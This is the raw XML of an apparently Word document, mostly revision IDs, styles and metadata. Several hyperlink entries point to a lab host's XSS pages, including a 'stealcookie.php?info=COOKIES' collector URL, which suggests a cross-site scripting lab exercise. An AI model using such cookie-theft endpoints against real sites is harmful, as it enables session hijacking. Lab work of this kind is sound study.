    <w:rsid w:val="00E63E29"/>
    <w:rsid w:val="00E644DE"/>
    <w:rsid w:val="00E64656"/>
    <w:rsid w:val="00E7013B"/>
    <w:rsid w:val="00E7061A"/>
    <w:rsid w:val="00E71B3C"/>
    <w:rsid w:val="00E72324"/>
    <w:rsid w:val="00E728A5"/>
    <w:rsid w:val="00E732FA"/>
    <w:rsid w:val="00E741BD"/>
    <w:rsid w:val="00E74751"/>
    <w:rsid w:val="00E74821"/>
    <w:rsid w:val="00E7511C"/>
    <w:rsid w:val="00E763F9"/>
    <w:rsid w:val="00E765B0"/>
    <w:rsid w:val="00E76A1D"/>
    <w:rsid w:val="00E76A71"/>
    <w:rsid w:val="00E81190"/>
    <w:rsid w:val="00E835CA"/>
    <w:rsid w:val="00E845CA"/>
    <w:rsid w:val="00E84890"/>
    <w:rsid w:val="00E860C5"/>
    <w:rsid w:val="00E87A85"/>
    <w:rsid w:val="00E909C0"/>
    <w:rsid w:val="00E90B2B"/>
    <w:rsid w:val="00E90B93"/>
    <w:rsid w:val="00E91B85"/>
    <w:rsid w:val="00E9297B"/>
    <w:rsid w:val="00E93EA1"/>
    <w:rsid w:val="00E940ED"/>
    <w:rsid w:val="00E941F1"/>
    <w:rsid w:val="00E946EB"/>
    <w:rsid w:val="00E94947"/>
    <w:rsid w:val="00E94DC3"/>
    <w:rsid w:val="00E95110"/>
    <w:rsid w:val="00E96438"/>
    <w:rsid w:val="00E9672D"/>
    <w:rsid w:val="00EA0707"/>
    <w:rsid w:val="00EA1021"/>
    <w:rsid w:val="00EA10C1"/>
    <w:rsid w:val="00EA130C"/>
    <w:rsid w:val="00EA2545"/>
    <w:rsid w:val="00EA2976"/>
    <w:rsid w:val="00EA3817"/>
    <w:rsid w:val="00EA5609"/>
    <w:rsid w:val="00EB0032"/>
    <w:rsid w:val="00EB01FB"/>
    <w:rsid w:val="00EB198B"/>
    <w:rsid w:val="00EB1F23"/>
    <w:rsid w:val="00EB2126"/>
    <w:rsid w:val="00EB2745"/>
    <w:rsid w:val="00EB340C"/>
    <w:rsid w:val="00EB4520"/>
    <w:rsid w:val="00EB5287"/>
    <w:rsid w:val="00EB55F7"/>
    <w:rsid w:val="00EB5ED1"/>
    <w:rsid w:val="00EB7215"/>
    <w:rsid w:val="00EB7DE2"/>
    <w:rsid w:val="00EC0AF6"/>
    <w:rsid w:val="00EC14DA"/>
    <w:rsid w:val="00EC1B0B"/>
    <w:rsid w:val="00EC1F4F"/>
    <w:rsid w:val="00EC2122"/>
    <w:rsid w:val="00EC4075"/>
    <w:rsid w:val="00EC542E"/>
    <w:rsid w:val="00EC5A48"/>
    <w:rsid w:val="00EC5BD8"/>
    <w:rsid w:val="00EC6223"/>
    <w:rsid w:val="00EC6EAB"/>
    <w:rsid w:val="00ED0F70"/>
    <w:rsid w:val="00ED1040"/>
    <w:rsid w:val="00ED17D4"/>
    <w:rsid w:val="00ED2E17"/>
    <w:rsid w:val="00ED2EFD"/>
    <w:rsid w:val="00ED374E"/>
    <w:rsid w:val="00ED44FF"/>
    <w:rsid w:val="00ED65EB"/>
    <w:rsid w:val="00ED6EAD"/>
    <w:rsid w:val="00ED7006"/>
    <w:rsid w:val="00ED715E"/>
    <w:rsid w:val="00ED7EA2"/>
    <w:rsid w:val="00EE019E"/>
    <w:rsid w:val="00EE037A"/>
    <w:rsid w:val="00EE0477"/>
    <w:rsid w:val="00EE1BDA"/>
    <w:rsid w:val="00EE275B"/>
    <w:rsid w:val="00EE2C5D"/>
    <w:rsid w:val="00EE3038"/>
    <w:rsid w:val="00EE4165"/>
    <w:rsid w:val="00EE5A41"/>
    <w:rsid w:val="00EE6036"/>
    <w:rsid w:val="00EE6C26"/>
    <w:rsid w:val="00EE6F77"/>
    <w:rsid w:val="00EE7001"/>
    <w:rsid w:val="00EF104C"/>
    <w:rsid w:val="00EF1656"/>
    <w:rsid w:val="00EF3205"/>
    <w:rsid w:val="00EF39B1"/>
    <w:rsid w:val="00EF40A4"/>
    <w:rsid w:val="00EF4495"/>
    <w:rsid w:val="00EF6981"/>
    <w:rsid w:val="00EF74D5"/>
    <w:rsid w:val="00EF7F17"/>
    <w:rsid w:val="00F012A7"/>
    <w:rsid w:val="00F02358"/>
    <w:rsid w:val="00F0328F"/>
    <w:rsid w:val="00F04768"/>
    <w:rsid w:val="00F07E4D"/>
    <w:rsid w:val="00F07F1F"/>
    <w:rsid w:val="00F103A0"/>
    <w:rsid w:val="00F11C30"/>
    <w:rsid w:val="00F126C3"/>
    <w:rsid w:val="00F12A00"/>
    <w:rsid w:val="00F12CB5"/>
    <w:rsid w:val="00F156DE"/>
    <w:rsid w:val="00F16243"/>
    <w:rsid w:val="00F17235"/>
    <w:rsid w:val="00F212A5"/>
    <w:rsid w:val="00F212DA"/>
    <w:rsid w:val="00F21E8C"/>
    <w:rsid w:val="00F2203B"/>
    <w:rsid w:val="00F22DC4"/>
    <w:rsid w:val="00F236CF"/>
    <w:rsid w:val="00F24641"/>
    <w:rsid w:val="00F248D7"/>
    <w:rsid w:val="00F26285"/>
    <w:rsid w:val="00F26B48"/>
    <w:rsid w:val="00F3052F"/>
    <w:rsid w:val="00F30AB2"/>
    <w:rsid w:val="00F30E67"/>
    <w:rsid w:val="00F32DD8"/>
    <w:rsid w:val="00F35378"/>
    <w:rsid w:val="00F364E6"/>
    <w:rsid w:val="00F3731E"/>
    <w:rsid w:val="00F374B4"/>
    <w:rsid w:val="00F422C4"/>
    <w:rsid w:val="00F42762"/>
    <w:rsid w:val="00F42DA2"/>
    <w:rsid w:val="00F442DE"/>
    <w:rsid w:val="00F44980"/>
    <w:rsid w:val="00F44A2C"/>
    <w:rsid w:val="00F44C52"/>
    <w:rsid w:val="00F44C5E"/>
    <w:rsid w:val="00F4526D"/>
    <w:rsid w:val="00F457C8"/>
    <w:rsid w:val="00F45AA2"/>
    <w:rsid w:val="00F47DF0"/>
    <w:rsid w:val="00F50AF5"/>
    <w:rsid w:val="00F50EDB"/>
    <w:rsid w:val="00F5117E"/>
    <w:rsid w:val="00F51638"/>
    <w:rsid w:val="00F518CE"/>
    <w:rsid w:val="00F51FDA"/>
    <w:rsid w:val="00F53414"/>
    <w:rsid w:val="00F53DB3"/>
    <w:rsid w:val="00F54E1E"/>
    <w:rsid w:val="00F54F10"/>
    <w:rsid w:val="00F554B3"/>
    <w:rsid w:val="00F55BFA"/>
    <w:rsid w:val="00F55CC6"/>
    <w:rsid w:val="00F61A54"/>
    <w:rsid w:val="00F61C27"/>
    <w:rsid w:val="00F6216E"/>
    <w:rsid w:val="00F6324C"/>
    <w:rsid w:val="00F636BE"/>
    <w:rsid w:val="00F63825"/>
    <w:rsid w:val="00F64581"/>
    <w:rsid w:val="00F64CE8"/>
    <w:rsid w:val="00F65DB5"/>
    <w:rsid w:val="00F66170"/>
    <w:rsid w:val="00F66F12"/>
    <w:rsid w:val="00F67399"/>
    <w:rsid w:val="00F71B82"/>
    <w:rsid w:val="00F72748"/>
    <w:rsid w:val="00F72BA6"/>
    <w:rsid w:val="00F72D5A"/>
    <w:rsid w:val="00F73E37"/>
    <w:rsid w:val="00F75245"/>
    <w:rsid w:val="00F75DA0"/>
    <w:rsid w:val="00F75DAC"/>
    <w:rsid w:val="00F75F59"/>
    <w:rsid w:val="00F76CC1"/>
    <w:rsid w:val="00F77590"/>
    <w:rsid w:val="00F77DE6"/>
    <w:rsid w:val="00F8332F"/>
    <w:rsid w:val="00F8364D"/>
    <w:rsid w:val="00F83901"/>
    <w:rsid w:val="00F83DCC"/>
    <w:rsid w:val="00F860E9"/>
    <w:rsid w:val="00F87CFE"/>
    <w:rsid w:val="00F907E5"/>
    <w:rsid w:val="00F90B4C"/>
    <w:rsid w:val="00F91FC9"/>
    <w:rsid w:val="00F9276C"/>
    <w:rsid w:val="00F9378A"/>
    <w:rsid w:val="00F93C5C"/>
    <w:rsid w:val="00F94095"/>
    <w:rsid w:val="00F9466B"/>
    <w:rsid w:val="00F94745"/>
    <w:rsid w:val="00F94A92"/>
    <w:rsid w:val="00F94C92"/>
    <w:rsid w:val="00F9538C"/>
    <w:rsid w:val="00F95B38"/>
    <w:rsid w:val="00F95C08"/>
    <w:rsid w:val="00F96612"/>
    <w:rsid w:val="00F96BD8"/>
    <w:rsid w:val="00F96C92"/>
    <w:rsid w:val="00F97ACF"/>
    <w:rsid w:val="00F97C7A"/>
    <w:rsid w:val="00FA011C"/>
    <w:rsid w:val="00FA202A"/>
    <w:rsid w:val="00FA24B8"/>
    <w:rsid w:val="00FA2681"/>
    <w:rsid w:val="00FA3FEC"/>
    <w:rsid w:val="00FA51C4"/>
    <w:rsid w:val="00FB1C36"/>
    <w:rsid w:val="00FB200A"/>
    <w:rsid w:val="00FB21B2"/>
    <w:rsid w:val="00FB32B1"/>
    <w:rsid w:val="00FB32F4"/>
    <w:rsid w:val="00FB3F64"/>
    <w:rsid w:val="00FB6521"/>
    <w:rsid w:val="00FB66BB"/>
    <w:rsid w:val="00FB7435"/>
    <w:rsid w:val="00FB7DAE"/>
    <w:rsid w:val="00FC160A"/>
    <w:rsid w:val="00FC19D7"/>
    <w:rsid w:val="00FC217D"/>
    <w:rsid w:val="00FC2329"/>
    <w:rsid w:val="00FC3B36"/>
    <w:rsid w:val="00FC5B0D"/>
    <w:rsid w:val="00FC6D23"/>
    <w:rsid w:val="00FD00DC"/>
    <w:rsid w:val="00FD0115"/>
    <w:rsid w:val="00FD0CDA"/>
    <w:rsid w:val="00FD1C24"/>
    <w:rsid w:val="00FD230F"/>
    <w:rsid w:val="00FD498B"/>
    <w:rsid w:val="00FD63BE"/>
    <w:rsid w:val="00FD641E"/>
    <w:rsid w:val="00FD6480"/>
    <w:rsid w:val="00FD70AB"/>
    <w:rsid w:val="00FD70E4"/>
    <w:rsid w:val="00FD766F"/>
    <w:rsid w:val="00FD7B25"/>
    <w:rsid w:val="00FE0062"/>
    <w:rsid w:val="00FE04FB"/>
    <w:rsid w:val="00FE05B4"/>
    <w:rsid w:val="00FE0F9F"/>
    <w:rsid w:val="00FE12A7"/>
    <w:rsid w:val="00FE1EB1"/>
    <w:rsid w:val="00FE297E"/>
    <w:rsid w:val="00FE2D03"/>
    <w:rsid w:val="00FE3697"/>
    <w:rsid w:val="00FE3DF3"/>
    <w:rsid w:val="00FE5458"/>
    <w:rsid w:val="00FE59CE"/>
    <w:rsid w:val="00FE6C1E"/>
    <w:rsid w:val="00FF008B"/>
    <w:rsid w:val="00FF01E4"/>
    <w:rsid w:val="00FF07B6"/>
    <w:rsid w:val="00FF08F4"/>
    <w:rsid w:val="00FF17FF"/>
    <w:rsid w:val="00FF1A09"/>
    <w:rsid w:val="00FF2A06"/>
    <w:rsid w:val="00FF4AA2"/>
    <w:rsid w:val="00FF4F58"/>
    <w:rsid w:val="00FF5C3B"/>
    <w:rsid w:val="00FF5ECA"/>
    <w:rsid w:val="00FF62B0"/>
    <w:rsid w:val="00FF74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CE3989"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{808E4E24-484B-43E3-9756-2F890C0A43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31F3F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009A7A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1672C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192.168.65.128/XSS/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.65.128/XSS/stealcookie.php?info=COOKIES" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.65.128/extremeinsecure/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.65.128/XSS/stealcookie.php?info=COOKIE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192.168.65.128/XSS/stealcookie.php?info=COOKIE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5195</TotalTime>
  <Pages>6</Pages>
  <Words>1440</Words>
  <Characters>8212</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>68</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9633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Rui Zhao</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rui Zhao</cp:lastModifiedBy>
  <cp:revision>3919</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-19T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-13T00:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>